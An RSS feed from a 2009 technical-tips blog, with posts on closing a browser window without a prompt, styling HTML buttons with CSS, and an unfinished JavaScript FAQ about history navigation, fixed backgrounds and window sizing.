<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Information World &#187; HTML</title>
	<atom:link href="http://www.dailyinfobyte.com/tag/html/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.dailyinfobyte.com</link>
	<description>Technical Tips and more...</description>
	<lastBuildDate>Thu, 12 Nov 2009 07:57:26 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>How to close a window without prompt?</title>
		<link>http://www.dailyinfobyte.com/2009/11/10/how-to-close-a-window-without-prompt/</link>
		<comments>http://www.dailyinfobyte.com/2009/11/10/how-to-close-a-window-without-prompt/#comments</comments>
		<pubDate>Tue, 10 Nov 2009 08:19:43 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technical]]></category>
		<category><![CDATA[]]></category>
		<category><![CDATA[closing a jsp]]></category>
		<category><![CDATA[closing a servlet window]]></category>
		<category><![CDATA[How to close a window without prompt?]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[Java script]]></category>
		<category><![CDATA[JSP]]></category>
		<category><![CDATA[servlet]]></category>
		<category><![CDATA[window.close()]]></category>
		<category><![CDATA[window.opener = top;]]></category>

		<guid isPermaLink="false">http://www.dailyinfobyte.com/?p=288</guid>
		<description><![CDATA[How to close a window without prompt?
For servlet:
        out.println (&#8221;&#60;script&#62;&#8221;);
        out.println (&#8221;window.opener = top;&#8221;);
        out.println (&#8221;window.close()&#8221;);
        out.println (&#8221;&#60;/script&#62;&#8221;);
For html or jsp:
         &#60;script&#62;
        window.opener = top;
        window.close();
        &#60;/script&#62;
]]></description>
			<content:encoded><![CDATA[<p>How to close a window without prompt?</p>
<p>For servlet:</p>
<p>        out.println (&#8221;&lt;script&gt;&#8221;);<br />
        out.println (&#8221;window.opener = top;&#8221;);<br />
        out.println (&#8221;window.close()&#8221;);<br />
        out.println (&#8221;&lt;/script&gt;&#8221;);</p>
<p>For html or jsp:</p>
<p>         &lt;script&gt;<br />
        window.opener = top;<br />
        window.close();<br />
        &lt;/script&gt;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dailyinfobyte.com/2009/11/10/how-to-close-a-window-without-prompt/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Changing the size and appearance of the button using CSS</title>
		<link>http://www.dailyinfobyte.com/2009/07/01/changing-the-size-and-appearance-of-the-button-using-css/</link>
		<comments>http://www.dailyinfobyte.com/2009/07/01/changing-the-size-and-appearance-of-the-button-using-css/#comments</comments>
		<pubDate>Wed, 01 Jul 2009 12:17:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technical]]></category>
		<category><![CDATA[background-color:]]></category>
		<category><![CDATA[border: 1px solid]]></category>
		<category><![CDATA[button properties]]></category>
		<category><![CDATA[Changing the size and appearance of the button using CSS]]></category>
		<category><![CDATA[content="text/html;]]></category>
		<category><![CDATA[CSS]]></category>
		<category><![CDATA[font-family:]]></category>
		<category><![CDATA[font-weight]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[INPUT TYPE=BUTTON]]></category>
		<category><![CDATA[padding:]]></category>
		<category><![CDATA[styling buttons]]></category>

		<guid isPermaLink="false">http://www.dailyinfobyte.com/?p=199</guid>
		<description><![CDATA[Following code is the example for changing the size and look of the buttons!!!&#60;!DOCTYPE HTML PUBLIC &#8220;-//W3C//DTD HTML 4.01 Transitional//EN&#8221; &#8220;http://www.w3.org/TR/html4/loose.dtd&#8221;&#62;
&#60;html&#62;
&#60;head&#62;
&#60;title&#62;Untitled Document&#60;/title&#62;
&#60;meta http-equiv=&#8221;Content-Type&#8221; content=&#8221;text/html; charset=iso-8859-1&#8243;&#62;
&#60;style type=&#8221;text/css&#8221;&#62;
&#60;!&#8211;
input {
font-family: &#8220;Times New Roman&#8221;, Times, serif;
font-size: 12px;
font-weight: bold;
color: #FF0000;
background-color: #FFCCCC;
padding: 5px;
height: 30px;
width: 100px;
}
input.myButton {
font-family: Arial, Helvetica, sans-serif;
font-size: 10px;
font-style: italic;
color: #660099;
background-color: #CCCCFF;
padding: 2px;
height: 25px;
width: 100px;
border: 1px solid #000000;
}
&#8211;&#62;
&#60;/style&#62;
&#60;/head&#62;
&#60;body&#62;
&#60;input type=&#8221;button&#8221; name=&#8221;Button&#8221; [...]]]></description>
			<content:encoded><![CDATA[<p>Following code is the example for changing the size and look of the buttons!!!&lt;!DOCTYPE HTML PUBLIC &#8220;-//W3C//DTD HTML 4.01 Transitional//EN&#8221; &#8220;http://www.w3.org/TR/html4/loose.dtd&#8221;&gt;<br />
&lt;html&gt;<br />
&lt;head&gt;<br />
&lt;title&gt;Untitled Document&lt;/title&gt;<br />
&lt;meta http-equiv=&#8221;Content-Type&#8221; content=&#8221;text/html; charset=iso-8859-1&#8243;&gt;<br />
&lt;style type=&#8221;text/css&#8221;&gt;<br />
&lt;!&#8211;<br />
input {<br />
font-family: &#8220;Times New Roman&#8221;, Times, serif;<br />
font-size: 12px;<br />
font-weight: bold;<br />
color: #FF0000;<br />
background-color: #FFCCCC;<br />
padding: 5px;<br />
height: 30px;<br />
width: 100px;<br />
}<br />
input.myButton {<br />
font-family: Arial, Helvetica, sans-serif;<br />
font-size: 10px;<br />
font-style: italic;<br />
color: #660099;<br />
background-color: #CCCCFF;<br />
padding: 2px;<br />
height: 25px;<br />
width: 100px;<br />
border: 1px solid #000000;<br />
}<br />
&#8211;&gt;<br />
&lt;/style&gt;<br />
&lt;/head&gt;</p>
<p>&lt;body&gt;<br />
&lt;input type=&#8221;button&#8221; name=&#8221;Button&#8221; value=&#8221;Button&#8221;&gt;<br />
&lt;input name=&#8221;textfield&#8221; type=&#8221;text&#8221; value=&#8221;123&#8243;&gt;<br />
&lt;input type=&#8221;button&#8221; name=&#8221;Submit2&#8243; value=&#8221;Button&#8221; class=&#8221;myButton&#8221;&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.dailyinfobyte.com/2009/07/01/changing-the-size-and-appearance-of-the-button-using-css/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Java Script &#8211; FAQ</title>
		<link>http://www.dailyinfobyte.com/2009/03/11/java-script-faq/</link>
		<comments>http://www.dailyinfobyte.com/2009/03/11/java-script-faq/#comments</comments>
		<pubDate>Thu, 12 Mar 2009 03:12:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technical]]></category>
		<category><![CDATA[Blur]]></category>
		<category><![CDATA[Document]]></category>
		<category><![CDATA[FAQ]]></category>
		<category><![CDATA[FAQ on JAVASCRIPT]]></category>
		<category><![CDATA[History]]></category>
		<category><![CDATA[HTML]]></category>
		<category><![CDATA[Java script]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[Self]]></category>
		<category><![CDATA[Style]]></category>
		<category><![CDATA[technical tips]]></category>

		<guid isPermaLink="false">http://www.dailyinfobyte.com/?p=105</guid>
		<description><![CDATA[FAQ on JAVASCRIPT
 
Table Of Contents
1.   Keywords. 2
2.   Introduction. 2
3.   Target Readers. 2
4.   Tips and Tricks. 2
4.1.   How do I use a JavaScript link to return to the previous page?. 2
4.2.   How do I get the page background image to stay fixed when the page is scrolled?  2
4.3.   How can I set a window&#8217;s size when [...]]]></description>
			<content:encoded><![CDATA[<p class="MsoTitle" style="margin: 0in 0in 0pt;"><span style="font-size: 16pt; mso-bidi-font-size: 12.0pt;"><strong><span style="text-decoration: underline;"><span style="font-family: Verdana;">FAQ on JAVASCRIPT</span></span></strong></span></p>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in; text-align: center; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto;" align="center"><span style="font-size: 10pt; color: black; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 9.0pt;"><span style="text-decoration: none;"><strong><span style="text-decoration: underline;"> </span></strong></span></span></p>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in; text-align: center; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto;" align="center"><strong style="mso-bidi-font-weight: normal;"><span style="text-decoration: underline;"><span style="font-size: 10pt; color: black; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 9.0pt;">Table Of Contents</span></span></strong></p>
<p class="MsoToc1" style="margin: 0in 0in 0pt; tab-stops: 24.0pt right dotted 431.5pt;"><span class="MsoHyperlink"><span style="font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-no-proof: yes;"><a href="http://www.dailyinfobyte.com/wp-admin/#_Toc90091857"><span style="font-size: small; color: #0000ff;">1.</span><span style="font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none;"><span style="mso-tab-count: 1;">   </span></span><span style="font-size: small; color: #0000ff;">Keywords</span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;"><span style="mso-tab-count: 1 dotted;">. </span></span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;">2</span></a></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-no-proof: yes;"></span></p>
<p class="MsoToc1" style="margin: 0in 0in 0pt; tab-stops: 24.0pt right dotted 431.5pt;"><span class="MsoHyperlink"><span style="font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-no-proof: yes;"><a href="http://www.dailyinfobyte.com/wp-admin/#_Toc90091858"><span style="font-size: small; color: #0000ff;">2.</span><span style="font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none;"><span style="mso-tab-count: 1;">   </span></span><span style="font-size: small; color: #0000ff;">Introduction</span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;"><span style="mso-tab-count: 1 dotted;">. </span></span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;">2</span></a></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-no-proof: yes;"></span></p>
<p class="MsoToc1" style="margin: 0in 0in 0pt; tab-stops: 24.0pt right dotted 431.5pt;"><span class="MsoHyperlink"><span style="font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-no-proof: yes;"><a href="http://www.dailyinfobyte.com/wp-admin/#_Toc90091859"><span style="font-size: small; color: #0000ff;">3.</span><span style="font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none;"><span style="mso-tab-count: 1;">   </span></span><span style="font-size: small; color: #0000ff;">Target Readers</span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;"><span style="mso-tab-count: 1 dotted;">. </span></span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;">2</span></a></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-no-proof: yes;"></span></p>
<p class="MsoToc1" style="margin: 0in 0in 0pt; tab-stops: 24.0pt right dotted 431.5pt;"><span class="MsoHyperlink"><span style="font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-no-proof: yes;"><a href="http://www.dailyinfobyte.com/wp-admin/#_Toc90091860"><span style="font-size: small; color: #0000ff;">4.</span><span style="font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none;"><span style="mso-tab-count: 1;">   </span></span><span style="font-size: small; color: #0000ff;">Tips and Tricks</span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;"><span style="mso-tab-count: 1 dotted;">. </span></span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;">2</span></a></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-no-proof: yes;"></span></p>
<p class="MsoToc2" style="margin: 0in 0in 0pt 12pt; tab-stops: 48.0pt right dotted 431.5pt;"><span class="MsoHyperlink"><span style="font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-no-proof: yes;"><a href="http://www.dailyinfobyte.com/wp-admin/#_Toc90091861"><span style="font-size: small; color: #0000ff;">4.1.</span><span style="font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none;"><span style="mso-tab-count: 1;">   </span></span><span style="font-size: small; color: #0000ff;">How do I use a JavaScript link to return to the previous page?</span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;"><span style="mso-tab-count: 1 dotted;">. </span></span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;">2</span></a></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-no-proof: yes;"></span></p>
<p class="MsoToc2" style="margin: 0in 0in 0pt 12pt; tab-stops: 48.0pt right dotted 431.5pt;"><span class="MsoHyperlink"><span style="font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-no-proof: yes;"><a href="http://www.dailyinfobyte.com/wp-admin/#_Toc90091862"><span style="font-size: small; color: #0000ff;">4.2.</span><span style="font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none;"><span style="mso-tab-count: 1;">   </span></span><span style="font-size: small; color: #0000ff;">How do I get the page background image to stay fixed when the page is scrolled?</span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;"><span style="mso-tab-count: 1;">  </span></span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;">2</span></a></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-no-proof: yes;"></span></p>
<p class="MsoToc2" style="margin: 0in 0in 0pt 12pt; tab-stops: 48.0pt right dotted 431.5pt;"><span class="MsoHyperlink"><span style="font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-no-proof: yes;"><a href="http://www.dailyinfobyte.com/wp-admin/#_Toc90091863"><span style="font-size: small; color: #0000ff;">4.3.</span><span style="font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none;"><span style="mso-tab-count: 1;">   </span></span><span style="font-size: small; color: #0000ff;">How can I set a window&#8217;s size when it is opened?</span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;"><span style="mso-tab-count: 1 dotted;">. </span></span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;">2</span></a></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-no-proof: yes;"></span></p>
<p class="MsoToc2" style="margin: 0in 0in 0pt 12pt; tab-stops: 48.0pt right dotted 431.5pt;"><span class="MsoHyperlink"><span style="font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-no-proof: yes;"><a href="http://www.dailyinfobyte.com/wp-admin/#_Toc90091864"><span style="font-size: small; color: #0000ff;">4.4.</span><span style="font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none;"><span style="mso-tab-count: 1;">   </span></span><span style="font-size: small; color: #0000ff;">How can I set a window&#8217;s position when it is opened?</span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;"><span style="mso-tab-count: 1 dotted;">. </span></span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;">3</span></a></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-no-proof: yes;"></span></p>
<p class="MsoToc2" style="margin: 0in 0in 0pt 12pt; tab-stops: 48.0pt right dotted 431.5pt;"><span class="MsoHyperlink"><span style="font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-no-proof: yes;"><a href="http://www.dailyinfobyte.com/wp-admin/#_Toc90091865"><span style="font-size: small; color: #0000ff;">4.5.</span><span style="font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none;"><span style="mso-tab-count: 1;">   </span></span><span style="font-size: small; color: #0000ff;">How do I use JavaScript to scroll to the top of the page?</span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;"><span style="mso-tab-count: 1 dotted;">. </span></span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;">3</span></a></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-no-proof: yes;"></span></p>
<p class="MsoToc2" style="margin: 0in 0in 0pt 12pt; tab-stops: 48.0pt right dotted 431.5pt;"><span class="MsoHyperlink"><span style="font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-no-proof: yes;"><a href="http://www.dailyinfobyte.com/wp-admin/#_Toc90091866"><span style="font-size: small; color: #0000ff;">4.6.</span><span style="font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none;"><span style="mso-tab-count: 1;">   </span></span><span style="font-size: small; color: #0000ff;">How do I stop the scrollbar from showing in a regular window?</span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;"><span style="mso-tab-count: 1 dotted;">. </span></span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;">3</span></a></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-no-proof: yes;"></span></p>
<p class="MsoToc2" style="margin: 0in 0in 0pt 12pt; tab-stops: 48.0pt right dotted 431.5pt;"><span class="MsoHyperlink"><span style="font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-no-proof: yes;"><a href="http://www.dailyinfobyte.com/wp-admin/#_Toc90091867"><span style="font-size: small; color: #0000ff;">4.7.</span><span style="font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none;"><span style="mso-tab-count: 1;">   </span></span><span style="font-size: small; color: #0000ff;">How do I attach more than one style to an element?</span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;"><span style="mso-tab-count: 1 dotted;">. </span></span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;">3</span></a></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-no-proof: yes;"></span></p>
<p class="MsoToc2" style="margin: 0in 0in 0pt 12pt; tab-stops: 48.0pt right dotted 431.5pt;"><span class="MsoHyperlink"><span style="font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-no-proof: yes;"><a href="http://www.dailyinfobyte.com/wp-admin/#_Toc90091868"><span style="font-size: small; color: #0000ff;">4.8.</span><span style="font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none;"><span style="mso-tab-count: 1;">   </span></span><span style="font-size: small; color: #0000ff;">How do I close a regular window with a JavaScript link, and how would I do it if I am using frames?</span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;"><span style="mso-tab-count: 1 dotted;">. </span></span><span style="display: none; font-size: 10pt; color: windowtext; text-decoration: none; mso-bidi-font-size: 12.0pt; text-underline: none; mso-hide: screen;">4</span></a></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt; mso-no-proof: yes;"></span></p>
<h1 style="margin: 12pt 0in 3pt;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 16.0pt;"> </span></h1>
<h1 style="margin: 12pt 0in 3pt 0.25in; text-indent: -0.25in; mso-list: l0 level1 lfo1; tab-stops: list .25in;"><a name="_Toc90091857"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: Verdana; mso-bidi-font-size: 16.0pt; mso-bidi-font-family: Verdana;"><span style="mso-list: Ignore;">1.<span style="font: 7pt &quot;Times New Roman&quot;;">    </span></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 16.0pt;">Keywords</span></a><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 16.0pt;"></span></h1>
<p class="MsoNormal" style="margin: 0in 0in 0pt;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">HTML, JavaScript, Style, Blur, History, Self, Document</span></p>
<h1 style="margin: 12pt 0in 3pt 0.25in; text-indent: -0.25in; mso-list: l0 level1 lfo1; tab-stops: list .25in;"><a name="_Toc90091860"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: Verdana; mso-bidi-font-size: 16.0pt; mso-bidi-font-family: Verdana;"><span style="mso-list: Ignore;">2.<span style="font: 7pt &quot;Times New Roman&quot;;">    </span></span></span><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 16.0pt;">Tips and Tricks</span></a><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 16.0pt;"></span></h1>
<h2 style="margin: 12pt 0in 3pt 0.55in; text-indent: -0.3in; mso-list: l0 level2 lfo1; tab-stops: list .55in;"><a name="_Toc90091861"><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: Verdana; mso-bidi-font-size: 14.0pt; mso-bidi-font-family: Verdana; mso-bidi-font-style: italic;"><span style="mso-list: Ignore;">2.1.<span style="font: 7pt &quot;Times New Roman&quot;;"> </span></span></span><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;">How do I use a JavaScript link to return to the previous page?</span></a><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;"></span></h2>
<p class="MsoNormal" style="margin: 0in 0in 0pt;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;"> </span></p>
<p class="MsoNormal" style="margin: 0in 0in 0pt 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">JavaScript includes what is called a <em>history object</em>.  It tracks the URLs visited by the browser. You can use this browser history as a means to return to the previous page (or, for that matter, to go back and forward through the history). This is especially useful when a hard-coded, specific link is not possible; for instance, in cases where you do not necessarily know the address of the previously visited page.  This is how a &#8220;previous page&#8221; or &#8220;go-back&#8221; link would appear in your HTML code: </span></p>
<p style="margin-left: 0.25in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;a href=&#8221;javascript:history.go(-1)&#8221;&gt;<br />
Go Back<br />
&lt;/a&gt;</span>
</p>
<p style="margin-left: 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">Alternatively, if you wanted to go forward instead of backward in the history, you would write the code thus:</span></p>
<p style="margin-left: 0.25in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;a href=&#8221;javascript:history.go(1)&#8221;&gt;<br />
Go Forward<br />
&lt;/a&gt;</span></p>
<div style="border-right: medium none; padding-right: 0in; border-top: medium none; padding-left: 0in; padding-bottom: 1pt; margin-left: 0.25in; border-left: medium none; margin-right: 0in; padding-top: 0in; border-bottom: windowtext 1pt solid; mso-element: para-border-div; mso-border-bottom-alt: solid windowtext .75pt;">
<p style="mso-padding-alt: 0in 0in 1.0pt 0in; mso-border-bottom-alt: solid windowtext .75pt; padding: 0in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">The numbers in the parentheses are the number of pages to move (forward or back, respectively, in the above examples).  You can also move more than one page; for instance javascript.history.go(-3) would navigate three pages back in the history.  Note that if there is no page in the history to go to, the JavaScript does not error out; it simply does nothing.</span></p>
</div>
<h2 style="margin: 12pt 0in 3pt 0.55in; text-indent: -0.3in; mso-list: l0 level2 lfo1; tab-stops: list .55in;"><a name="_Toc90091862"><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: Verdana; mso-bidi-font-size: 14.0pt; mso-bidi-font-family: Verdana; mso-bidi-font-style: italic;"><span style="mso-list: Ignore;">2.2.<span style="font: 7pt &quot;Times New Roman&quot;;"> </span></span></span><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;">How do I get the page background image to stay fixed when the page is scrolled?</span></a><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;"><span style="mso-spacerun: yes;">  </span></span></h2>
</p>
<p style="margin-left: 0.25in;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">One simple way is to add bgproperties=&#8221;fixed&#8221; to the body tag, like this:</span></p>
<div style="border-right: medium none; padding-right: 0in; border-top: medium none; padding-left: 0in; padding-bottom: 1pt; margin-left: 0.25in; border-left: medium none; margin-right: 0in; padding-top: 0in; border-bottom: windowtext 1pt solid; mso-element: para-border-div; mso-border-bottom-alt: solid windowtext .75pt;">
<p style="mso-padding-alt: 0in 0in 1.0pt 0in; mso-border-bottom-alt: solid windowtext .75pt; padding: 0in;"><span style="font-size: 10pt; color: blue; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;">&lt;body bgproperties=&#8221;fixed&#8221;&gt;</span></p>
</div>
<h2 style="margin: 12pt 0in 3pt 0.55in; text-indent: -0.3in; mso-list: l0 level2 lfo1; tab-stops: list .55in;"><a name="_Toc90091863"><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-fareast-font-family: Verdana; mso-bidi-font-size: 14.0pt; mso-bidi-font-family: Verdana; mso-bidi-font-style: italic;"><span style="mso-list: Ignore;">2.3.<span style="font: 7pt &quot;Times New Roman&quot;;"> </span></span></span><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;">How can I set a window&#8217;s size when it is opened?</span></a><span style="font-size: 10pt; color: #ff9900; font-style: normal; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 14.0pt; mso-bidi-font-style: italic;"> </span></h2>
<p class="MsoNormal" style="margin: 0in 0in 0pt;"><span style="font-size: 10pt; font-family: &quot;Verdana&quot;,&quot;sans-serif&quot;; mso-bidi-font-size: 12.0pt;"> </span></p>
